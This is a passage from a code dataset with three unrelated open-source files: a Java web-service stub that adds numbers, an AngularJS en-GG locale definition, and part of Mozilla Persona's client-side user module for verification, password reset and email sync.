code\n * and therefore, elected the GPL Version 2 license, then the option applies\n * only if the new code is made subject to such option by the copyright\n * holder.\n */\n\npackage wsa.w3c.fromwsdl.issue608.server;\n\nimport javax.jws.WebService;\n\n/**\n * @author Rama Pulavarthi\n */\n\n@WebService(serviceName=\"AddNumbersService\", portName=\"AddNumbersPort\",\n endpointInterface = \"wsa.w3c.fromwsdl.issue608.server.AddNumbersPortType\", targetNamespace = \"http://example.com/\")\npublic class AddNumbersImpl implements AddNumbersPortType {\n public int addNumbers( int number1, int number2) throws AddNumbersFault_Exception {\n return number1 + number2;\n }\n\n\n}\n"} {"text": "'use strict';\nangular.module(\"ngLocale\", [], [\"$provide\", function($provide) {\nvar PLURAL_CATEGORY = {ZERO: \"zero\", ONE: \"one\", TWO: \"two\", FEW: \"few\", MANY: \"many\", OTHER: \"other\"};\nfunction getDecimals(n) {\n n = n + '';\n var i = n.indexOf('.');\n return (i == -1) ? 0 : n.length - i - 1;\n}\n\nfunction getVF(n, opt_precision) {\n var v = opt_precision;\n\n if (undefined === v) {\n v = Math.min(getDecimals(n), 3);\n }\n\n var base = Math.pow(10, v);\n var f = ((n * base) | 0) % base;\n return {v: v, f: f};\n}\n\n$provide.value(\"$locale\", {\n \"DATETIME_FORMATS\": {\n \"AMPMS\": [\n \"AM\",\n \"PM\"\n ],\n \"DAY\": [\n \"Sunday\",\n \"Monday\",\n \"Tuesday\",\n \"Wednesday\",\n \"Thursday\",\n \"Friday\",\n \"Saturday\"\n ],\n \"ERANAMES\": [\n \"Before Christ\",\n \"Anno Domini\"\n ],\n \"ERAS\": [\n \"BC\",\n \"AD\"\n ],\n \"FIRSTDAYOFWEEK\": 0,\n \"MONTH\": [\n \"January\",\n \"February\",\n \"March\",\n \"April\",\n \"May\",\n \"June\",\n \"July\",\n \"August\",\n \"September\",\n \"October\",\n \"November\",\n \"December\"\n ],\n \"SHORTDAY\": [\n \"Sun\",\n \"Mon\",\n \"Tue\",\n \"Wed\",\n \"Thu\",\n \"Fri\",\n \"Sat\"\n ],\n \"SHORTMONTH\": [\n \"Jan\",\n \"Feb\",\n \"Mar\",\n \"Apr\",\n \"May\",\n \"Jun\",\n \"Jul\",\n \"Aug\",\n \"Sep\",\n \"Oct\",\n \"Nov\",\n \"Dec\"\n ],\n \"STANDALONEMONTH\": [\n \"January\",\n \"February\",\n \"March\",\n \"April\",\n \"May\",\n \"June\",\n \"July\",\n \"August\",\n \"September\",\n \"October\",\n \"November\",\n \"December\"\n ],\n \"WEEKENDRANGE\": [\n 5,\n 6\n ],\n \"fullDate\": \"EEEE, d MMMM y\",\n \"longDate\": \"d MMMM y\",\n \"medium\": \"d MMM y HH:mm:ss\",\n \"mediumDate\": \"d MMM y\",\n \"mediumTime\": \"HH:mm:ss\",\n \"short\": \"dd/MM/y HH:mm\",\n \"shortDate\": \"dd/MM/y\",\n \"shortTime\": \"HH:mm\"\n },\n \"NUMBER_FORMATS\": {\n \"CURRENCY_SYM\": \"\\u00a3\",\n \"DECIMAL_SEP\": \".\",\n \"GROUP_SEP\": \",\",\n \"PATTERNS\": [\n {\n \"gSize\": 3,\n \"lgSize\": 3,\n \"maxFrac\": 3,\n \"minFrac\": 0,\n \"minInt\": 1,\n \"negPre\": \"-\",\n \"negSuf\": \"\",\n \"posPre\": \"\",\n \"posSuf\": \"\"\n },\n {\n \"gSize\": 3,\n \"lgSize\": 3,\n \"maxFrac\": 2,\n \"minFrac\": 2,\n \"minInt\": 1,\n \"negPre\": \"-\\u00a4\",\n \"negSuf\": \"\",\n \"posPre\": \"\\u00a4\",\n \"posSuf\": \"\"\n }\n ]\n },\n \"id\": \"en-gg\",\n \"localeID\": \"en_GG\",\n \"pluralCat\": function(n, opt_precision) { var i = n | 0; var vf = getVF(n, opt_precision); if (i == 1 && vf.v == 0) { return PLURAL_CATEGORY.ONE; } return PLURAL_CATEGORY.OTHER;}\n});\n}]);\n"} {"text": " -1);\n }\n\n // Determine if a certificate is expired. That will be\n // if it was issued *before* the domain key was last updated or\n // if the certificate expires in less that 5 minutes from now.\n function isCertExpired(serverTime, creationTime, cert) {\n // if it expires in less than 2 minutes, it's too old to use.\n var diff = cert.payload.exp.valueOf() - serverTime.valueOf();\n if (diff < (60 * 2 * 1000)) {\n return true;\n }\n\n // or if it was issued before the last time the domain key\n // was updated, it's invalid\n if (!cert.payload.iat) {\n helpers.log('Data Format ERROR: expected cert to have iat ' +\n 'property, but found none, marking expired');\n return true;\n } else if (cert.payload.iat < creationTime) {\n helpers.log('Certificate issued ' + cert.payload.iat +\n ' is before creation time ' + creationTime + ', marking expired');\n return true;\n }\n\n return false;\n }\n\n /*\n * Throws if the email record is invalid.\n * Record is invalid if:\n * 1) cannot load pubkey\n * 2) cannot load cert\n * 3) cannot extract cert\n * 4) cert is expired.\n */\n function checkRecordValidity(jwcrypto, record, serverTime, creationTime) {\n jwcrypto.loadPublicKeyFromObject(record.pub);\n\n if (!record.cert)\n throw new Error(\"missing cert\");\n\n var cert = jwcrypto.extractComponents(record.cert);\n if (isCertExpired(serverTime, creationTime, cert))\n throw new Error(\"expired cert\");\n }\n\n function removeInvalidIdentities(onSuccess, onFailure) {\n withContext(function(userContext, networkContext) {\n var serverTime = networkContext.getServerTime();\n var creationTime = networkContext.getDomainKeyCreationTime();\n\n cryptoLoader.load(function(jwcrypto) {\n var issuer = User.rpInfo.getIssuer();\n var emails = storage.getEmails(issuer);\n _.each(emails, function(record, address) {\n try {\n checkRecordValidity(jwcrypto, record, serverTime, creationTime);\n } catch (x) {\n return storage.invalidateEmail(address, issuer);\n }\n });\n onSuccess();\n });\n }, onFailure);\n }\n\n function stageAddressVerification(email, password, stagingStrategy,\n onComplete, onFailure) {\n // These are saved for the addressVerificationPoll. If there is\n // a stagedEmail or stagedPassword when the poll completes, try to\n // authenticate the user.\n stagedEmail = email;\n stagedPassword = password;\n\n // stagingStrategy is a curried function that will have all but the\n // onComplete and onFailure functions already set up.\n stagingStrategy(function(status) {\n if (!status) status = { success: false };\n var staged = status.success;\n\n if (!staged) status.reason = \"throttle\";\n // Used on the main site when the user verifies - once\n // verification is complete, the user is redirected back to the\n // RP and logged in.\n var site = User.rpInfo.getReturnTo();\n if (staged && site) storage.setReturnTo(site);\n complete(onComplete, status);\n }, onFailure);\n }\n\n function completeAddressVerification(completeFunc, token, password,\n onComplete, onFailure) {\n User.tokenInfo(token, function(info) {\n var invalidInfo = { valid: false };\n if (info) {\n completeFunc(token, password, function (resp) {\n var valid = resp.success;\n var result = invalidInfo;\n\n withContext(function(context) {\n if (valid) {\n result = _.extend({ valid: valid }, info);\n storage.setReturnTo(\"\");\n // If the user has successfully completed an address verification,\n // they are authenticated to the password status.\n context.setAuthLevel(\"password\");\n }\n\n complete(onComplete, result);\n }, onFailure);\n }, onFailure);\n } else if (onComplete) {\n onComplete(invalidInfo);\n }\n }, onFailure);\n\n }\n\n /**\n * onSuccess, if called, will return with \"complete\" if the verification\n * completes and the user is authed to the \"password\" level, or \"mustAuth\" if\n * the user must enter their password.\n */\n function addressVerificationPoll(checkFunc, email, onSuccess, onFailure) {\n function userVerified(resp) {\n if (stagedEmail && stagedPassword) {\n // The user has set their email and password as part of the\n // staging flow. Log them in now just to make sure their\n // authentication creds are up to date. This fixes a problem where the\n // backend incorrectly sends a mustAuth status to users who have just\n // completed verification. See issue #1682\n // https://github.com/mozilla/browserid/issues/1682\n User.authenticate(stagedEmail, stagedPassword, function(authenticated) {\n // The address verification poll does not send back a userid.\n // Use the userid set in User.authenticate\n withContext(function(context) {\n resp.userid = context.getUserId();\n resp.status = authenticated ? \"complete\" : \"mustAuth\";\n completeVerification(resp);\n }, onFailure);\n }, onFailure);\n\n stagedEmail = stagedPassword = null;\n }\n else {\n // If the user's completionStatus is complete but their\n // original authStatus was not password, meaning they have\n // not entered in their authentication credentials this session.\n // If the user is not authenticated to the password level, the backend\n // will reject any requests to certify a key because the user will\n // not have the correct creds to do so.\n // See issue #2088 https://github.com/mozilla/browserid/issues/2088\n //\n // Since a user may have entered their password on the main site during\n // a password reset, the only reliable way to know the user's auth\n // status is to ask the backend. Clear the current context and ask\n // the backend for an updated session_context.\n clearContext();\n User.checkAuthentication(function(authStatus) {\n if (resp.status === \"complete\" && authStatus !== \"password\")\n resp.status = \"mustAuth\";\n\n // The address verification poll does not send back a userid.\n // use the userid set in onContextChange.\n withContext(function(context) {\n resp.userid = context.getUserId();\n completeVerification(resp);\n }, onFailure);\n }, onFailure);\n }\n }\n\n function completeVerification(resp) {\n // As soon as the registration comes back as complete, we should\n // ensure that the stagedOnBehalfOf is cleared so there is no stale\n // data.\n storage.setReturnTo(\"\");\n\n // registrationComplete is used in shouldAskIfUsersComputer to\n // prevent the user from seeing the \"is this your computer\" screen if\n // they just completed a registration.\n registrationComplete = true;\n\n // If there is any sort of userid and auth_status, sync the emails.\n // If the user has to enter their password and status is mustAuth,\n // the required_email module expects the emails to already be synced.\n // See issue #3178\n withContext(function(context) {\n // If the status is still complete, the user's auth status is\n // definitively password.\n if (resp.status === \"complete\") {\n loggedIn(\"password\", resp.userid);\n }\n\n if (context.isUserAuthenticated()) {\n User.syncEmails(function() {\n complete(onSuccess, resp.status);\n }, onFailure);\n }\n else {\n complete(onSuccess, resp.status);\n }\n }, onFailure);\n }\n\n function poll() {\n checkFunc(email, function(resp) {\n var status = resp.status;\n // registration status checks the status of the last initiated registration,\n // it's possible return values are:\n // 'complete' - registration has been completed\n // 'pending' - a registration is in progress\n // 'mustAuth' - user must authenticate\n // 'noRegistration' - no registration is in progress\n if (status === \"complete\" || status === \"mustAuth\") {\n userVerified(resp);\n }\n else if (status === 'pending') {\n pollTimeout = setTimeout(poll, pollDuration);\n }\n else {\n complete(onFailure, status);\n }\n }, onFailure);\n }\n\n poll();\n }\n\n function cancelRegistrationPoll() {\n if (pollTimeout) {\n clearTimeout(pollTimeout);\n pollTimeout = null;\n }\n }\n\n function getIdPName(addressInfo) {\n return helpers.getDomainFromEmail(addressInfo.email);\n }\n\n /**\n * Persist an address and key pair locally.\n * @method persistEmailKeypair\n * @param {string} email - Email address to persist.\n * @param {object} keypair - Key pair to save\n * @param {function} [onComplete] - Called on successful completion.\n * @param {function} [onFailure] - Called on error.\n */\n function persistEmailKeypair(email, keypair, cert, onComplete, onFailure) {\n // XXX This needs to be looked at to make sure caching does not bite us.\n var issuer = User.rpInfo.getIssuer();\n User.addressInfo(email, function(info) {\n var now = new Date();\n var email_obj = storage.getEmail(email, issuer) || {\n created: now\n };\n\n _.extend(email_obj, {\n updated: now,\n pub: keypair.publicKey.toSimpleObject(),\n priv: keypair.secretKey.toSimpleObject(),\n cert: cert\n });\n\n if (info.state === \"unverified\") {\n email_obj.unverified = true;\n } else if (email_obj.unverified) {\n delete email_obj.unverified;\n }\n\n storage.addEmail(email, email_obj, issuer);\n if (onComplete) onComplete(true);\n }, onFailure);\n }\n\n /**\n * Persist an email address without a keypair\n * @method persistEmailWithoutKeypair\n * @param {object} options - options to save\n * @param {string} options.email - Email address to persist.\n */\n function persistEmailWithoutKeypair(options, issuer) {\n storage.addEmail(options.email, {\n created: new Date()\n }, issuer);\n }\n\n /**\n * Certify an identity with the server, persist it to storage if the server\n * says the identity is good\n * @method certifyEmailKeypair\n */\n function certifyEmailKeypair(email, keypair, onComplete, onFailure) {\n var rpInfo = User.rpInfo;\n network.certKey(email, keypair.publicKey, rpInfo.getIssuer(), rpInfo.getAllowUnverified(),\n function(cert) {\n persistEmailKeypair(email, keypair, cert, onComplete, onFailure);\n }, onFailure);\n }\n\n\n function withContext(onSuccess, onFailure) {\n network.withContext(function(networkContext) {\n // the context object will have been updated in onContextChange.\n onSuccess(context, networkContext);\n }, onFailure);\n }\n\n function clearContext() {\n network.clearContext();\n }\n\n function onContextChange(msg, newContext) {\n context = UserContext.create(newContext);\n var authLevel = context.getAuthLevel();\n if (window.$) {\n // TODO get this out of here!\n // jQuery is not included in the communication_iframe\n var func = !!authLevel ? 'addClass' : 'removeClass';\n $('body')[func]('authenticated');\n }\n\n if (context.isUserAuthenticated()) {\n // when session context returns with an authenticated user, update\n // localStorage to indicate we've seen this user on this device\n storage.usersComputer.setSeen(context.getUserId());\n }\n else {\n storage.clear();\n }\n }\n\n function loggedIn(authLevel, userId, onComplete, onFailure) {\n withContext(function(context) {\n context.setAuthLevel(authLevel);\n context.setUserId(userId);\n complete(onComplete, true);\n }, onFailure);\n }\n\n function loggedOut(onComplete, onFailure) {\n withContext(function(context) {\n storage.clear();\n\n context.setAuthLevel(false);\n context.setUserId(null);\n complete(onComplete, true);\n }, onFailure);\n }\n\n function handleAuthenticationResponse(email, type, onComplete,\n onFailure, status) {\n var authenticated = status.success;\n if (!authenticated) return loggedOut(complete.curry(onComplete, false), onFailure);\n\n var userid = status.userid;\n loggedIn(type, userid, function() {\n // The back end can suppress asking the user whether this is their\n // computer. This happens on FirefoxOS devices for now and may expand\n // in the future.\n if (status.suppress_ask_if_users_computer) {\n storage.usersComputer.setConfirmed(userid);\n }\n\n User.syncEmails(complete.curry(onComplete, authenticated), onFailure);\n }, onFailure);\n }\n\n User = {\n init: function(config) {\n config = config || {};\n mediator.subscribe('context_info', onContextChange);\n\n if (config.provisioning) {\n provisioning = config.provisioning;\n }\n\n // BEGIN TESTING API\n if (config.pollDuration) {\n pollDuration = config.pollDuration;\n }\n // END TESTING API\n },\n\n reset: function() {\n provisioning = BrowserID.Provisioning;\n User.resetCaches();\n User.rpInfo = null;\n registrationComplete = false;\n pollDuration = POLL_DURATION;\n stagedEmail = stagedPassword = context = null;\n },\n\n resetCaches: function() {\n addressCache = {};\n primaryAuthCache = {};\n },\n\n /**\n * Set the RP info\n * @method setRpInfo\n */\n setRpInfo: function(rpInfo) {\n User.rpInfo = rpInfo;\n },\n\n /**\n * Set the interface to use for networking. Used for unit testing.\n * @method setNetwork\n * @param {BrowserID.Network} networkInterface - BrowserID.Network\n * compatible interface to use.\n */\n setNetwork: function(networkInterface) {\n network = networkInterface;\n },\n\n setOriginEmail: function(email) {\n storage.site.set(User.rpInfo.getOrigin(), \"email\", email);\n },\n\n getOriginEmail: function() {\n return storage.site.get(User.rpInfo.getOrigin(), \"email\");\n },\n\n /**\n * Return the user's userid, which will an integer if the user\n * is authenticated, undefined otherwise.\n *\n * @method userid\n */\n userid: function(onComplete, onFailure) {\n if (!onComplete) throw new Error(\"no longer supports sync get\");\n withContext(function(context) {\n complete(onComplete, context.getUserId());\n }, onFailure);\n },\n\n withContext: withContext,\n clearContext: clearContext,\n\n /**\n * Create a user account - this creates an user account that must\n * be verified.\n * @method createSecondaryUser\n * @param {string} email\n * @param {string} password\n * @param {function} [onComplete] - Called on completion.\n * @param {function} [onFailure] - Called on error.\n */\n createSecondaryUser: function(email, password, onComplete, onFailure) {\n stageAddressVerification(email, password,\n network.createUser.bind(network, email, password, User.rpInfo), function(status) {\n // If creating an unverified account, the user will not go\n // through the verification flow while the dialog is open and the\n // cache will not be updated accordingly. Update the cache now.\n if (status.unverified) {\n var cachedAddress = addressCache[email];\n if (cachedAddress) {\n cachedAddress.state = \"unverified\";\n }\n }\n complete(onComplete, status);\n }, onFailure);\n },\n\n /**\n * Create a primary user.\n * @method createPrimaryUser\n * @param {object} info\n * @param {function} onComplete - function to call on complettion. Called\n * with two parameters - status and info.\n * Status can be:\n * primary.already_added\n * primary.verified\n * primary.verify\n * primary.could_not_add\n *\n * info is passed on primary.verify and contains the info necessary to\n * verify the user with the IdP\n */\n createPrimaryUser: function(info, onComplete, onFailure) {\n var email = info.email;\n User.provisionPrimaryUser(email, info, function(status, provInfo) {\n if (status === \"primary.verified\") {\n User.authenticateWithAssertion(email, provInfo.assertion, function(status) {\n if (status) {\n onComplete(\"primary.verified\");\n }\n else {\n onComplete(\"primary.could_not_add\");\n }\n }, onFailure);\n }\n else {\n onComplete(status, provInfo);\n }\n }, onFailure);\n },\n\n /**\n * A full provision a primary user, if they are authenticated, save their\n * cert/keypair. Note, we do not authenticate to login.persona.org but\n * merely get an assertion for login.persona.org so that we can either add the\n * email to the current account or authenticate the user if not\n * authenticated.\n * @method provisionPrimaryUser\n * @param {string} email\n * @param {object} info - provisioning info\n * @param {function} [onComplete] - called when complete. Called with\n * status field and info. Status can be:\n * primary.already_added\n * primary.verified\n * primary.verify\n * primary.could_not_add\n * @param {function} [onFailure] - called on failure\n */\n provisionPrimaryUser: function(email, info, onComplete, onFailure) {\n User.primaryUserAuthenticationInfo(email, info, function(authInfo) {\n if (authInfo.authenticated) {\n persistEmailKeypair(email, authInfo.keypair, authInfo.cert,\n function() {\n // We are getting an assertion for persona.org.\n User.getAssertion(email, PERSONA_ORG_AUDIENCE, function(assertion) {\n if (assertion) {\n onComplete(\"primary.verified\", {\n assertion: assertion\n });\n }\n else {\n onComplete(\"primary.could_not_add\");\n }\n }, onFailure);\n }\n );\n }\n else {\n onComplete(\"primary.verify\", info);\n }\n }, onFailure);\n },\n\n /**\n * Get the IdP authentication info for a user.\n * @method primaryUserAuthenticationInfo\n * @param {string} email\n * @param {object} info - provisioning info\n * @param {function} [onComplete] - called when complete. Called with\n * provisioning info as well as keypair, cert, and authenticated.\n * authenticated - boolean, true if user is authenticated with primary.\n * false otw.\n * keypair - returned if user is authenticated.\n * cert - returned if user is authenticated.\n * @param {function} [onFailure] - called on failure\n */\n primaryUserAuthenticationInfo: function(email, info, onComplete, onFailure) {\n var idInfo = storage.getEmail(email, User.rpInfo.getIssuer());\n\n primaryAuthCache = primaryAuthCache || {};\n\n function complete(info) {\n primaryAuthCache[email] = info;\n onComplete && _.defer(function() {\n onComplete(info);\n });\n }\n\n if (primaryAuthCache[email]) {\n // If we have the info in our cache, we most definitely do not have to\n // ask for it.\n return complete(primaryAuthCache[email]);\n }\n else if (idInfo && idInfo.cert) {\n // If we already have the info in storage, we know the user has a valid\n // cert with their IdP, we say they are authenticated and pass back the\n // appropriate info.\n var userInfo = _.extend({authenticated: true}, idInfo, info);\n return complete(userInfo);\n }\n\n provisioning(\n {\n email: email,\n url: info.prov,\n ephemeral: !storage.usersComputer.confirmed(email)\n },\n function(keypair, cert) {\n var userInfo = _.extend({\n keypair: keypair,\n cert: cert,\n authenticated: true\n }, info);\n\n complete(userInfo);\n },\n function(error) {\n // issue #2339 - in case an error is raised we don't care\n // about the specific error code.\n if (error.code === \"primaryError\") {\n var userInfo = _.extend({\n authenticated: false\n }, info);\n complete(userInfo);\n }\n else {\n onFailure($.extend(info, { action: { message: error }}));\n }\n }\n );\n },\n\n /**\n * Poll the server until user registration is complete.\n * @method waitForUserValidation\n * @param {string} email - email address to check.\n * @param {function} [onSuccess] - Called to give status updates.\n * @param {function} [onFailure] - Called on error.\n */\n waitForUserValidation: addressVerificationPoll.curry(network.checkUserRegistration),\n\n /**\n * Cancel the waitForUserValidation poll\n * @method cancelUserValidation\n */\n cancelUserValidation: cancelRegistrationPoll,\n\n /**\n * Get site and email info for a token\n * @method tokenInfo\n * @param {string} token\n * @param {function} [onComplete]\n * @param {function} [onFailure]\n */\n tokenInfo: function(token, onComplete, onFailure) {\n network.emailForVerificationToken(token, function (info) {\n if (info) {\n info = _.extend(info, { returnTo: storage.getReturnTo() });\n }\n\n complete(onComplete, info);\n }, onFailure);\n\n },\n\n /**\n * Verify a user\n * @method verifyUser\n * @param {string} token - token to verify.\n * @param {string} password\n * @param {function} [onComplete] - Called on completion.\n * Called with an object with valid, email, and origin if valid, called\n * with valid=false otw.\n * @param {function} [onFailure] - Called on error.\n */\n verifyUser: completeAddressVerification.curry(network.completeUserRegistration),\n\n /**\n * Check if the user can set their password. Only returns true for users\n * with secondary accounts\n * @method canSetPassword\n * @param {function} [onComplete] - Called on with boolean flag on\n * successful completion.\n * @param {function} [onFailure] - Called on error.\n */\n canSetPassword: function(onComplete, onFailure) {\n withContext(function(ctx) {\n complete(onComplete, ctx.hasPassword());\n }, onFailure);\n },\n\n /**\n * update the password of the current user.\n * @method changePassword\n * @param {string} oldpassword - the old password.\n * @param {string} newpassword - the new password.\n * @param {function} [onComplete] - called on completion. Called with one\n * parameter, status - set to true if password update is successful, false\n * otw.\n * @param {function} [onFailure] - called on XHR failure.\n */\n changePassword: function(oldpassword, newpassword, onComplete, onFailure) {\n network.changePassword(oldpassword, newpassword, function(resp) {\n // successful change of password will upgrade a session to password\n // level auth\n var success = resp.success;\n if (!success)\n return complete(onComplete, success);\n\n withContext(function(context) {\n loggedIn(\"password\", context.getUserId(),\n onComplete, onFailure);\n }, onFailure);\n }, onFailure);\n },\n\n /**\n * Request a password reset for the given email address.\n * @method requestPasswordReset\n * @param {string} email\n * @param {function} [onComplete] - Callback to call when complete, called\n * with a single object, info.\n * info.status {boolean} - true or false whether request was successful.\n * info.reason {string} - if status false, reason of failure.\n * @param {function} [onFailure] - Called on XHR failure.\n */\n requestPasswordReset: function(email, onComplete, onFailure) {\n var rpInfo = User.rpInfo;\n User.addressInfo(email, function(info) {\n // user is not known. Can't request a password reset.\n if (info.state === \"unknown\") {\n complete(onComplete, { success: false, reason: \"invalid_email\" });\n }\n // user is trying to reset the password of a primary address.\n else if (info.type === \"primary\") {\n complete(onComplete, { success: false, reason: \"primary_address\" });\n }\n else {\n stageAddressVerification(email, null,\n network.requestPasswordReset.bind(network, email, rpInfo),\n onComplete, onFailure);\n }\n }, onFailure);\n },\n\n /**\n * Verify the password reset for a user.\n * @method completePasswordReset\n * @param {string} token - token to verify.\n * @param {string} password\n * @param {function} [onComplete] - Called on completion.\n * Called with an object with valid, email, and origin if valid, called\n * with valid=false otw.\n * @param {function} [onFailure] - Called on error.\n */\n completePasswordReset: completeAddressVerification.curry(network.completePasswordReset),\n\n /**\n * Wait for the password reset to complete\n * @method waitForPasswordResetComplete\n * @param {string} email - email address to check.\n * @param {function} [onSuccess] - Called to give status updates.\n * @param {function} [onFailure] - Called on error.\n */\n waitForPasswordResetComplete: addressVerificationPoll.curry(network.checkPasswordReset),\n\n /**\n * Cancel the waitForPasswordResetComplete poll\n * @method cancelWaitForPasswordResetComplete\n */\n cancelWaitForPasswordResetComplete: cancelRegistrationPoll,\n\n /**\n * Request the reverification of an unverified email address\n * @method requestEmailReverify\n * @param {string} email\n * @param {function} [onComplete]\n * @param {function} [onFailure]\n */\n requestEmailReverify: function(email, onComplete, onFailure) {\n if (!storage.getEmail(email, User.rpInfo.getIssuer())) {\n // user does not own this address.\n complete(onComplete, { success: false, reason: \"invalid_email\" });\n }\n else {\n // try to reverify this address.\n stageAddressVerification(email, null,\n network.requestEmailReverify.bind(network, email, User.rpInfo),\n onComplete, onFailure);\n }\n },\n\n // the verification page for reverifying an email and adding an email to an\n // account are the same, both are handled by the /confirm page. the\n // /confirm page uses the verifyEmail function. completeEmailReverify is\n // not needed.\n\n /**\n * Wait for the email reverification to complete\n * @method waitForEmailReverifyComplete\n * @param {string} email - email address to check.\n * @param {function} [onSuccess] - Called to give status updates.\n * @param {function} [onFailure] - Called on error.\n */\n waitForEmailReverifyComplete: addressVerificationPoll.curry(network.checkEmailReverify),\n\n /**\n * Cancel the waitForEmailReverifyComplete poll\n * @method cancelWaitForEmailReverifyComplete\n */\n cancelWaitForEmailReverifyComplete: cancelRegistrationPoll,\n\n /**\n * Request a transition to secondary for the given email address.\n * @method requestTransitionToSecondary\n * @param {string} email\n * @param {string} password\n * @param {function} [onComplete] - Callback to call when complete, called\n * with a single object, info.\n * info.status {boolean} - true or false whether request was successful.\n * info.reason {string} - if status false, reason of failure.\n * @param {function} [onFailure] - Called on XHR failure.\n */\n requestTransitionToSecondary: function(email, password, onComplete, onFailure) {\n var rpInfo = User.rpInfo;\n User.addressInfo(email, function(info) {\n // user is not known. Can't request a transition to secondary.\n if (info.state === \"unknown\") {\n complete(onComplete, { success: false, reason: \"invalid_email\" });\n }\n // user is trying to transition to a secondary for a primary address.\n else if (info.type === \"primary\") {\n complete(onComplete, { success: false, reason: \"primary_address\" });\n }\n else {\n stageAddressVerification(email, password,\n network.requestTransitionToSecondary.bind(network, email, password, rpInfo),\n onComplete, onFailure);\n }\n }, onFailure);\n },\n\n /**\n * Verify the transition to secondary for a user.\n * @method completeTransitionToSecondary\n * @param {string} token - token to verify.\n * @param {string} password\n * @param {function} [onComplete] - Called on completion.\n * Called with an object with valid, email, and origin if valid, called\n * with valid=false otw.\n * @param {function} [onFailure] - Called on error.\n */\n completeTransitionToSecondary: completeAddressVerification.curry(network.completeTransitionToSecondary),\n\n /**\n * Wait for the transition to secondary to complete\n * @method waitForTransitionToSecondaryComplete\n * @param {string} email - email address to check.\n * @param {function} [onSuccess] - Called to give status updates.\n * @param {function} [onFailure] - Called on error.\n */\n waitForTransitionToSecondaryComplete: addressVerificationPoll.curry(network.checkTransitionToSecondary),\n\n /**\n * Cancel the waitForTransitionToSecondaryComplete poll\n * @method cancelWaitForTransitionToSecondaryComplete\n */\n cancelWaitForTransitionToSecondaryComplete: cancelRegistrationPoll,\n\n\n /**\n * Cancel the current user's account. Remove last traces of their\n * identity.\n * @method cancelUser\n * @param {function} [onComplete] - Called whenever complete.\n * @param {function} [onFailure] - called on error.\n */\n cancelUser: function(onComplete, onFailure) {\n network.cancelUser(function() {\n loggedOut(onComplete, onFailure);\n }, onFailure);\n },\n\n /**\n * Log the current user out.\n * @method logoutUser\n * @param {function} [onComplete] - Called whenever complete.\n * @param {function} [onFailure] - called on error.\n */\n logoutUser: function(onComplete, onFailure) {\n User.checkAuthentication(function(authenticated) {\n if (!authenticated) return complete(onComplete, authenticated);\n\n network.logout(function() {\n loggedOut(onComplete, onFailure);\n }, onFailure);\n }, onFailure);\n },\n\n /**\n * Sync local identities with login.persona.org. Generally should not need to\n * be called.\n * @method syncEmails\n * @param {function} [onComplete] - Called whenever complete.\n * @param {function} [onFailure] - Called on error.\n */\n syncEmails: function(onComplete, onFailure) {\n removeInvalidIdentities(function () {\n var issued_identities = User.getStoredEmailKeypairs();\n\n network.listEmails(function(server_emails) {\n withContext(function(context) {\n var userid = context.getUserId();\n // update our local storage map of email addresses to user ids\n if (userid) {\n storage.updateEmailToUserIDMapping(userid, server_emails);\n }\n });\n\n // lists of emails\n var client_emails = _.keys(issued_identities);\n\n var emails_to_add_pair = [_.difference(server_emails, client_emails)];\n var emails_to_remove_pair = [_.difference(client_emails, server_emails)];\n var emails_to_update_pair = [_.intersection(client_emails, server_emails)];\n\n var issuer = User.rpInfo.getIssuer();\n if (!User.rpInfo.isDefaultIssuer()) {\n var force_issuer_identities = storage.getEmails(issuer);\n var force_issuer_emails = _.keys(force_issuer_identities);\n emails_to_add_pair.push(_.difference(server_emails, force_issuer_emails));\n emails_to_remove_pair.push(_.difference(force_issuer_emails, server_emails));\n emails_to_update_pair.push(_.intersection(force_issuer_emails, server_emails));\n }\n\n // remove emails\n _.each(emails_to_remove_pair, function (emails_to_remove, i) {\n _.each(emails_to_remove, function(email) {\n if (0 === i)\n storage.removeEmail(email, \"default\");\n else\n storage.removeEmail(email, issuer);\n });\n });\n\n // these are new emails\n _.each(emails_to_add_pair, function(emails_to_add, i) {\n _.each(emails_to_add, function(email) {\n if (0 === i) {\n persistEmailWithoutKeypair({ email: email }, \"default\");\n } else {\n // issuer is always a secondary\n persistEmailWithoutKeypair({ email: email }, issuer);\n }\n });\n });\n complete(onComplete);\n }, onFailure);\n }, onFailure);\n },\n\n /**\n * Check whether the current user is authenticated. Calls the callback\n * with false if cookies are disabled.\n * @method checkAuthentication\n * @param {function} [onComplete] - Called with user's auth level if\n * authenticated, false otw.\n * @param {function} [onFailure] - Called on error.\n */\n checkAuthentication: function(onComplete, onFailure) {\n network.cookiesEnabled(function(cookiesEnabled) {\n if (cookiesEnabled) {\n withContext(function(context) {\n complete(onComplete, context.getAuthLevel());\n }, onFailure);\n }\n else {\n complete(onComplete, cookiesEnabled);\n }\n }, onFailure);\n },\n\n /**\n * Check whether the current user is authenticated. If authenticated, sync\n * identities.\n * @method checkAuthenticationAndSync\n * @param {function} [onComplete] - Called on sync completion with one\n * boolean parameter, authenticated. authenticated will be true if user\n * is authenticated, false otw.\n * @param {function} [onFailure] - Called on error.\n */\n checkAuthenticationAndSync: function(onComplete, onFailure) {\n User.checkAuthentication(function(authenticated) {\n if (authenticated) {\n User.syncEmails(function() {\n // no emails means they must have been removed from this\n // account. at any rate, the user can't do anything without\n // any emails, so log them out.\n if (storage.getEmailCount() === 0) {\n User.logoutUser(function() {\n complete(onComplete, false);\n }, onFailure);\n } else {\n complete(onComplete, authenticated);\n }\n }, onFailure);\n }\n else {\n complete(onComplete, authenticated);\n }\n }, onFailure);\n },\n\n /**\n * Authenticate the user with the given email and password. This will sync\n * the user's addresses.\n * @method authenticate\n * @param {string} email - Email address to authenticate.\n * @param {string} password - Password.\n * @param {function} [onComplete] - Called on completion with status. true\n * if user is authenticated, false otw.\n * @param {function} [onFailure] - Called on error.\n */\n authenticate: function(email, password, onComplete, onFailure) {\n network.authenticate(email, password, User.rpInfo.getAllowUnverified(),\n handleAuthenticationResponse.curry(email, \"password\", onComplete,\n onFailure), onFailure);\n },\n\n /**\n * Authenticate the user with the given email and assertion. This will sync\n * the user's addresses.\n * @method authenticateWithAssertion\n * @param {string} email\n * @param {string} assertion\n * @param {function} [onComplete] - Called on completion with status. true\n * if user is authenticated, false otw.\n * @param {function} [onFailure] - Called on error.\n */\n authenticateWithAssertion: function(email, assertion, onComplete, onFailure) {\n network.authenticateWithAssertion(email, assertion,\n handleAuthenticationResponse.curry(email, \"assertion\", onComplete,\n onFailure), onFailure);\n\n },\n\n /**\n * Check whether the email is already registered.\n * @method isEmailRegistered\n * @param {string} email - Email address to check.\n * @param {function} [onComplete] - Called with one boolean parameter when\n * complete. Parameter is true if `email` is already registered, false\n * otw.\n * @param {function} [onFailure] - 